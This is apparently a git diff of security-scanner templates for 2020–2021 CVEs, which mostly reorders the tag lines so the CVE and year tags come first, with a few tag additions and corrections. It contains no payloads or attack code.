- tags: cve,cve2020,oracle,weblogic,disclosure,exposure
+ tags: cve2020,cve,oracle,weblogic,disclosure,exposure
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml
index 597ea1cebb..2ccc17d0c9 100644
--- a/http/cves/2020/CVE-2020-27481.yaml
+++ b/http/cves/2020/CVE-2020-27481.yaml
@@ -27,7 +27,7 @@ info:
vendor: goodlayers
product: good_learning_management_system
framework: wordpress
- tags: goodlayerslms,sqli,wpscan,cve,cve2020,goodlayers,wordpress
+ tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml
index 8dd0bc1273..a7338b0846 100644
--- a/http/cves/2020/CVE-2020-27982.yaml
+++ b/http/cves/2020/CVE-2020-27982.yaml
@@ -27,7 +27,7 @@ info:
vendor: icewarp
product: mail_server
shodan-query: title:"icewarp"
- tags: xss,icewarp,packetstorm,cve,cve2020
+ tags: cve,cve2020,xss,icewarp,packetstorm
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml
index dc1a4e51ad..90b09b547d 100644
--- a/http/cves/2020/CVE-2020-28185.yaml
+++ b/http/cves/2020/CVE-2020-28185.yaml
@@ -28,7 +28,7 @@ info:
vendor: terra-master
product: tos
fofa-query: '"TerraMaster" && header="TOS"'
- tags: cve,cve2020,terramaster,enum,tos,terra-master
+ tags: cve2020,cve,terramaster,enum,tos,terra-master
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml
index 1507fb28c9..be6e0a4178 100644
--- a/http/cves/2020/CVE-2020-28188.yaml
+++ b/http/cves/2020/CVE-2020-28188.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: terra-master
product: tos
- tags: packetstorm,cve,cve2020,terramaster,rce,oast,mirai,unauth,terra-master
+ tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master
variables:
useragent: '{{rand_base(6)}}'
diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml
index 3fbb980839..d1dcd1a172 100644
--- a/http/cves/2020/CVE-2020-28208.yaml
+++ b/http/cves/2020/CVE-2020-28208.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: rocket.chat
product: rocket.chat
- tags: packetstorm,cve,cve2020,rocketchat,rocket.chat
+ tags: cve,cve2020,packetstorm,rocketchat,rocket.chat
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml
index bee3eb44be..77006b15f5 100644
--- a/http/cves/2020/CVE-2020-28351.yaml
+++ b/http/cves/2020/CVE-2020-28351.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: mitel
product: shoretel_firmware
- tags: packetstorm,cve,cve2020,shoretel,xss,mitel
+ tags: cve,cve2020,packetstorm,shoretel,xss,mitel
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml
index d5fede3cac..616af3e7ef 100644
--- a/http/cves/2020/CVE-2020-28871.yaml
+++ b/http/cves/2020/CVE-2020-28871.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: monitorr_project
product: monitorr
- tags: unauth,cve,fileupload,monitor,edb,intrusive,packetstorm,cve2020,rce,monitorr_project
+ tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml
index 220497d9a8..5cfebf6ef3 100644
--- a/http/cves/2020/CVE-2020-28976.yaml
+++ b/http/cves/2020/CVE-2020-28976.yaml
@@ -28,7 +28,7 @@ info:
vendor: canto
product: canto
framework: wordpress
- tags: packetstorm,cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb,canto
+ tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml
index 641b4382b8..a8120692c4 100644
--- a/http/cves/2020/CVE-2020-29164.yaml
+++ b/http/cves/2020/CVE-2020-29164.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: rainbowfishsoftware
product: pacsone_server
- tags: pacsone,xss,cve,cve2020,rainbowfishsoftware
+ tags: cve,cve2020,pacsone,xss,rainbowfishsoftware
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml
index 19b139c2b0..0a78ce8cca 100644
--- a/http/cves/2020/CVE-2020-29227.yaml
+++ b/http/cves/2020/CVE-2020-29227.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: car_rental_management_system_project
product: car_rental_management_system
- tags: cve,cve2020,lfi,car_rental_management_system_project
+ tags: cve,cve2020,lfi,car_rental_management_system_project,sqli
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml
index bcbdf2e43a..b6484c08d7 100644
--- a/http/cves/2020/CVE-2020-29284.yaml
+++ b/http/cves/2020/CVE-2020-29284.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: multi_restaurant_table_reservation_system_project
product: multi_restaurant_table_reservation_system
- tags: cve2020,tablereservation,sqli,unauth,edb,cve,multi_restaurant_table_reservation_system_project
+ tags: cve,cve2020,tablereservation,sqli,unauth,edb,multi_restaurant_table_reservation_system_project
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml
index bb4e6cfb7a..f9102fcabf 100644
--- a/http/cves/2020/CVE-2020-3452.yaml
+++ b/http/cves/2020/CVE-2020-3452.yaml
@@ -30,7 +30,7 @@ info:
max-request: 2
vendor: cisco
product: adaptive_security_appliance_software
- tags: lfi,kev,packetstorm,cve,cve2020,cisco
+ tags: cve,cve2020,lfi,kev,packetstorm,cisco
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml
index 0cde6078dd..3d54b7c0bb 100644
--- a/http/cves/2020/CVE-2020-35234.yaml
+++ b/http/cves/2020/CVE-2020-35234.yaml
@@ -25,7 +25,7 @@ info:
vendor: wp-ecommerce
product: easy_wp_smtp
framework: wordpress
- tags: cve,cve2020,wordpress,wp-plugin,smtp,wp-ecommerce
+ tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml
index db246ba91b..a22d046232 100644
--- a/http/cves/2020/CVE-2020-35580.yaml
+++ b/http/cves/2020/CVE-2020-35580.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: searchblox
product: searchblox
- tags: cve,cve2020,lfi,searchblox
+ tags: cve2020,cve,lfi,searchblox
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml
index 21f9a0107b..e76caa8d0e 100644
--- a/http/cves/2020/CVE-2020-35598.yaml
+++ b/http/cves/2020/CVE-2020-35598.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: advanced_comment_system_project
product: advanced_comment_system
- tags: acs,edb,seclists,cve,cve2020,lfi,advanced_comment_system_project
+ tags: cve,cve2020,acs,edb,seclists,lfi,advanced_comment_system_project
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml
index ab447c3ee1..fdff73a20c 100644
--- a/http/cves/2020/CVE-2020-35749.yaml
+++ b/http/cves/2020/CVE-2020-35749.yaml
@@ -27,7 +27,7 @@ info:
vendor: presstigers
product: simple_board_job
framework: wordpress
- tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve,presstigers
+ tags: cve,cve2020,authenticated,packetstorm,wp,lfi,wordpress,wp-plugin,wpscan,presstigers
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml
index 04af26fb6c..8096a1cecc 100644
--- a/http/cves/2020/CVE-2020-35774.yaml
+++ b/http/cves/2020/CVE-2020-35774.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: twitter
product: twitter-server
- tags: cve,cve2020,xss,twitter-server,twitter
+ tags: cve2020,cve,xss,twitter-server,twitter
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml
index 3271793a4e..0394452535 100644
--- a/http/cves/2020/CVE-2020-35951.yaml
+++ b/http/cves/2020/CVE-2020-35951.yaml
@@ -26,7 +26,7 @@ info:
vendor: expresstech
product: quiz_and_survey_master
framework: wordpress
- tags: cve2020,wordpress,wp-plugin,wpscan,cve,intrusive,expresstech
+ tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml
index 49dd7f35c0..2c9ef8eaca 100644
--- a/http/cves/2020/CVE-2020-35985.yaml
+++ b/http/cves/2020/CVE-2020-35985.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: rukovoditel
product: rukovoditel
- tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated
+ tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml
index b1b1856d0f..c3db4397f2 100644
--- a/http/cves/2020/CVE-2020-36365.yaml
+++ b/http/cves/2020/CVE-2020-36365.yaml
@@ -26,7 +26,7 @@ info:
vendor: smartstore
product: smartstorenet
shodan-query: http.html:'content="Smartstore'
- tags: cve,cve2020,redirect,smartstore
+ tags: cve2020,cve,redirect,smartstore
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml
index f1d9dbff70..d295b6e10d 100644
--- a/http/cves/2020/CVE-2020-36510.yaml
+++ b/http/cves/2020/CVE-2020-36510.yaml
@@ -27,7 +27,7 @@ info:
vendor: codetipi
product: 15zine
framework: wordpress
- tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan,codetipi
+ tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml
index 9b0b1a5645..2dcea2689d 100644
--- a/http/cves/2020/CVE-2020-5191.yaml
+++ b/http/cves/2020/CVE-2020-5191.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: phpgurukul
product: hospital_management_system
- tags: cve2020,hms,cms,xss,authenticated,edb,cve,phpgurukul
+ tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml
index 0549e17bb3..affccd074b 100644
--- a/http/cves/2020/CVE-2020-5192.yaml
+++ b/http/cves/2020/CVE-2020-5192.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: phpgurukul
product: hospital_management_system
- tags: cve2020,hms,cms,sqli,authenticated,edb,cve,phpgurukul
+ tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul
variables:
num: "999999999"
diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml
index e91e989bda..c9e2ae7ce9 100644
--- a/http/cves/2020/CVE-2020-5307.yaml
+++ b/http/cves/2020/CVE-2020-5307.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: phpgurukul
product: dairy_farm_shop_management_system
- tags: sqli,edb,cve,cve2020,phpgurukul
+ tags: cve,cve2020,sqli,edb,phpgurukul
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml
index 85238b71d2..8817055728 100644
--- a/http/cves/2020/CVE-2020-5405.yaml
+++ b/http/cves/2020/CVE-2020-5405.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: vmware
product: spring_cloud_config
- tags: cve,cve2020,lfi,springcloud,vmware
+ tags: cve2020,cve,lfi,springcloud,vmware
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml
index 3b32fc90ea..51f1826ba8 100644
--- a/http/cves/2020/CVE-2020-5776.yaml
+++ b/http/cves/2020/CVE-2020-5776.yaml
@@ -25,7 +25,7 @@ info:
vendor: magmi_project
product: magmi
shodan-query: http.component:"Magento"
- tags: magmi,magento,tenable,cve,cve2020,magmi_project
+ tags: cve,cve2020,magmi,magento,tenable,magmi_project
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml
index a2f1e202fb..4f0df59c6e 100644
--- a/http/cves/2020/CVE-2020-5777.yaml
+++ b/http/cves/2020/CVE-2020-5777.yaml
@@ -26,7 +26,7 @@ info:
vendor: magmi_project
product: magmi
shodan-query: http.component:"Magento"
- tags: plugin,tenable,cve,cve2020,magmi,magento,auth,bypass,magmi_project
+ tags: cve,cve2020,plugin,tenable,magmi,magento,auth,bypass,magmi_project
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml
index c54fbe67bd..b1a8d1045c 100644
--- a/http/cves/2020/CVE-2020-5847.yaml
+++ b/http/cves/2020/CVE-2020-5847.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: unraid
product: unraid
- tags: cve,cve2020,rce,kev,unraid
+ tags: cve2020,cve,rce,kev,unraid
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml
index a6936c41ad..6c43556720 100644
--- a/http/cves/2020/CVE-2020-5902.yaml
+++ b/http/cves/2020/CVE-2020-5902.yaml
@@ -34,7 +34,7 @@ info:
max-request: 8
vendor: f5
product: big-ip_access_policy_manager
- tags: cve2020,bigip,rce,kev,packetstorm,cve,f5
+ tags: cve,cve2020,bigip,rce,kev,packetstorm,f5
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml
index 588379f8de..67fff32f7f 100644
--- a/http/cves/2020/CVE-2020-6207.yaml
+++ b/http/cves/2020/CVE-2020-6207.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: sap
product: solution_manager
- tags: cve,cve2020,sap,solman,rce,kev
+ tags: cve2020,cve,sap,solman,rce,kev
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml
index 682a8eeb1a..f45b693e77 100644
--- a/http/cves/2020/CVE-2020-6308.yaml
+++ b/http/cves/2020/CVE-2020-6308.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: sap
product: businessobjects_business_intelligence_platform
- tags: cve,cve2020,sap,ssrf,oast,unauth
+ tags: cve2020,cve,sap,ssrf,oast,unauth
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml
index 1c518eb5ff..bdab9ed277 100644
--- a/http/cves/2020/CVE-2020-7107.yaml
+++ b/http/cves/2020/CVE-2020-7107.yaml
@@ -29,7 +29,7 @@ info:
vendor: etoilewebdesign
product: ultimate_faq
framework: wordpress
- tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp,etoilewebdesign
+ tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml
index 9b4253b2e7..679a12c6bd 100644
--- a/http/cves/2020/CVE-2020-7943.yaml
+++ b/http/cves/2020/CVE-2020-7943.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: puppet
product: puppet_enterprise
- tags: cve,cve2020,puppet,exposure,puppetdb
+ tags: cve2020,cve,puppet,exposure,puppetdb
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml
index a6f582fded..322ba020bf 100644
--- a/http/cves/2020/CVE-2020-7961.yaml
+++ b/http/cves/2020/CVE-2020-7961.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: liferay
product: liferay_portal
- tags: packetstorm,cve,cve2020,rce,liferay,kev
+ tags: cve2020,cve,packetstorm,rce,liferay,kev
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml
index a99af0e010..6ddf7107b2 100644
--- a/http/cves/2020/CVE-2020-7980.yaml
+++ b/http/cves/2020/CVE-2020-7980.yaml
@@ -27,7 +27,7 @@ info:
vendor: intelliantech
product: aptus_web
shodan-query: http.title:"Intellian Aptus Web"
- tags: cve,cve2020,intellian,aptus,packetstorm,satellian,rce,intelliantech
+ tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml
index 3bce2b99ac..814c1498cf 100644
--- a/http/cves/2020/CVE-2020-8193.yaml
+++ b/http/cves/2020/CVE-2020-8193.yaml
@@ -26,7 +26,7 @@ info:
max-request: 6
vendor: citrix
product: application_delivery_controller_firmware
- tags: cve,cve2020,citrix,lfi,kev,packetstorm
+ tags: cve2020,cve,citrix,lfi,kev,packetstorm
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml
index ad29fa152b..20f2943b58 100644
--- a/http/cves/2020/CVE-2020-8209.yaml
+++ b/http/cves/2020/CVE-2020-8209.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: citrix
product: xenmobile_server
- tags: cve,cve2020,citrix,lfi,xenmobile
+ tags: cve2020,cve,citrix,lfi,xenmobile
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml
index 26906cc1e2..63f5ba0d63 100644
--- a/http/cves/2020/CVE-2020-8512.yaml
+++ b/http/cves/2020/CVE-2020-8512.yaml
@@ -28,7 +28,7 @@ info:
vendor: icewarp
product: icewarp_server
shodan-query: title:"icewarp"
- tags: edb,packetstorm,cve,cve2020,xss,icewarp
+ tags: cve,cve2020,edb,packetstorm,xss,icewarp
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml
index 63275e7356..e87e3f324a 100644
--- a/http/cves/2020/CVE-2020-8615.yaml
+++ b/http/cves/2020/CVE-2020-8615.yaml
@@ -28,7 +28,7 @@ info:
product: tutor_lms
framework: wordpress
publicwww-query: /wp-content/plugins/tutor/
- tags: wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,themeum
+ tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml
index d251799f41..a329c03a42 100644
--- a/http/cves/2020/CVE-2020-8641.yaml
+++ b/http/cves/2020/CVE-2020-8641.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: lotus_core_cms_project
product: lotus_core_cms
- tags: cve2020,lfi,lotus,cms,edb,cve,lotus_core_cms_project
+ tags: cve,cve2020,lfi,lotus,cms,edb,lotus_core_cms_project
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml
index daf7bbee32..1836308e38 100644
--- a/http/cves/2020/CVE-2020-8644.yaml
+++ b/http/cves/2020/CVE-2020-8644.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: playsms
product: playsms
- tags: unauth,kev,packetstorm,cve,cve2020,ssti,playsms,rce
+ tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml
index e7534ab608..fb5f73b698 100644
--- a/http/cves/2020/CVE-2020-8654.yaml
+++ b/http/cves/2020/CVE-2020-8654.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: eyesofnetwork
product: eyesofnetwork
- tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020
+ tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml
index b384044df5..51af8135ff 100644
--- a/http/cves/2020/CVE-2020-8772.yaml
+++ b/http/cves/2020/CVE-2020-8772.yaml
@@ -28,7 +28,7 @@ info:
vendor: revmakx
product: infinitewp_client
framework: wordpress
- tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx
+ tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml
index 5f94ae8130..0e084680b0 100644
--- a/http/cves/2020/CVE-2020-8813.yaml
+++ b/http/cves/2020/CVE-2020-8813.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: cacti
product: cacti
- tags: cve,cve2020,cacti,rce,oast
+ tags: cve2020,cve,cacti,rce,oast
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml
index 13ca54d519..be0711c7bb 100644
--- a/http/cves/2020/CVE-2020-8982.yaml
+++ b/http/cves/2020/CVE-2020-8982.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: citrix
product: sharefile_storagezones_controller
- tags: cve,cve2020,citrix,lfi
+ tags: cve2020,cve,citrix,lfi
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml
index eb22c3f057..c51ea8e788 100644
--- a/http/cves/2020/CVE-2020-9043.yaml
+++ b/http/cves/2020/CVE-2020-9043.yaml
@@ -30,7 +30,7 @@ info:
vendor: wpcentral
product: wpcentral
framework: wordpress
- tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020
+ tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml
index afebfb101a..f9d1f462c9 100644
--- a/http/cves/2020/CVE-2020-9054.yaml
+++ b/http/cves/2020/CVE-2020-9054.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: zyxel
product: nas326_firmware
- tags: cve,cve2020,rce,zyxel,injection,kev
+ tags: cve2020,cve,rce,zyxel,injection,kev
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml
index 1e4c06bf76..c708fa948c 100644
--- a/http/cves/2020/CVE-2020-9344.yaml
+++ b/http/cves/2020/CVE-2020-9344.yaml
@@ -28,7 +28,7 @@ info:
vendor: atlassian
product: subversion_application_lifecycle_management
shodan-query: http.component:"Atlassian Jira"
- tags: cve,cve2020,atlassian,jira,xss
+ tags: cve2020,cve,atlassian,jira,xss
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml
index d8442b2745..6ef60fa931 100644
--- a/http/cves/2020/CVE-2020-9484.yaml
+++ b/http/cves/2020/CVE-2020-9484.yaml
@@ -34,7 +34,7 @@ info:
vendor: apache
product: tomcat
shodan-query: title:"Apache Tomcat"
- tags: rce,packetstorm,cve,cve2020,apache,tomcat
+ tags: cve2020,cve,rce,packetstorm,apache,tomcat
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml
index 1fa96f5e85..0f0891108d 100644
--- a/http/cves/2020/CVE-2020-9496.yaml
+++ b/http/cves/2020/CVE-2020-9496.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: apache
product: ofbiz
- tags: ofbiz,packetstorm,cve,cve2020,apache,java
+ tags: cve,cve2020,ofbiz,packetstorm,apache,java
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml
index da2541f3d6..b95e91f65a 100644
--- a/http/cves/2021/CVE-2021-1472.yaml
+++ b/http/cves/2021/CVE-2021-1472.yaml
@@ -30,7 +30,7 @@ info:
vendor: cisco
product: rv160_firmware
shodan-query: http.html:"Cisco rv340"
- tags: packetstorm,seclists,auth-bypass,injection,cve,cve2021,cisco,rce,intrusive
+ tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml
index 7155ec2077..09925e15e5 100644
--- a/http/cves/2021/CVE-2021-1498.yaml
+++ b/http/cves/2021/CVE-2021-1498.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: cisco
product: hyperflex_hx_data_platform
- tags: kev,packetstorm,cve,cve2021,cisco,rce,oast,mirai
+ tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml
index bc796e8fc2..e0d777a8cf 100644
--- a/http/cves/2021/CVE-2021-1499.yaml
+++ b/http/cves/2021/CVE-2021-1499.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: cisco
product: hyperflex_hx_data_platform
- tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco
+ tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml
index 4ca77bfc84..5f31181c0d 100644
--- a/http/cves/2021/CVE-2021-20031.yaml
+++ b/http/cves/2021/CVE-2021-20031.yaml
@@ -25,7 +25,7 @@ info:
vendor: sonicwall
product: sonicos
google-query: inurl:"auth.html" intitle:"SonicWall"
- tags: sonicwall,redirect,edb,packetstorm,cve,cve2021
+ tags: cve,cve2021,sonicwall,redirect,edb,packetstorm
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml
index 1e1f58d50c..d035753b37 100644
--- a/http/cves/2021/CVE-2021-20038.yaml
+++ b/http/cves/2021/CVE-2021-20038.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: sonicwall
product: sma_200_firmware
- tags: cve,cve2021,overflow,rce,sonicwall,kev
+ tags: cve2021,cve,overflow,rce,sonicwall,kev
variables:
useragent: '{{rand_base(6)}}'
diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml
index c6a1707098..502a854f66 100644
--- a/http/cves/2021/CVE-2021-20091.yaml
+++ b/http/cves/2021/CVE-2021-20091.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: buffalo
product: wsr-2533dhpl2-bk_firmware
- tags: cve,cve2021,buffalo,firmware,iot,tenable
+ tags: cve2021,cve,buffalo,firmware,iot,tenable
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml
index 2e12931a51..41f365a424 100644
--- a/http/cves/2021/CVE-2021-20092.yaml
+++ b/http/cves/2021/CVE-2021-20092.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: buffalo
product: wsr-2533dhpl2-bk_firmware
- tags: cve,cve2021,buffalo,firmware,iot,tenable
+ tags: cve2021,cve,buffalo,firmware,iot,tenable
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml
index d93eba5763..6287fffbfd 100644
--- a/http/cves/2021/CVE-2021-20114.yaml
+++ b/http/cves/2021/CVE-2021-20114.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: tecnick
product: tcexam
- tags: tcexam,disclosure,exposure,tenable,cve,cve2021,tecnick
+ tags: cve,cve2021,tcexam,disclosure,exposure,tenable,tecnick
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml
index 6e126c54e2..6c7db5fce2 100644
--- a/http/cves/2021/CVE-2021-20123.yaml
+++ b/http/cves/2021/CVE-2021-20123.yaml
@@ -27,7 +27,7 @@ info:
vendor: draytek
product: vigorconnect
shodan-query: http.html:"VigorConnect"
- tags: cve,cve2021,draytek,lfi,vigorconnect,tenable
+ tags: cve2021,cve,draytek,lfi,vigorconnect,tenable
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml
index 57a26a8bf1..a87c696209 100644
--- a/http/cves/2021/CVE-2021-20124.yaml
+++ b/http/cves/2021/CVE-2021-20124.yaml
@@ -27,7 +27,7 @@ info:
vendor: draytek
product: vigorconnect
shodan-query: http.html:"VigorConnect"
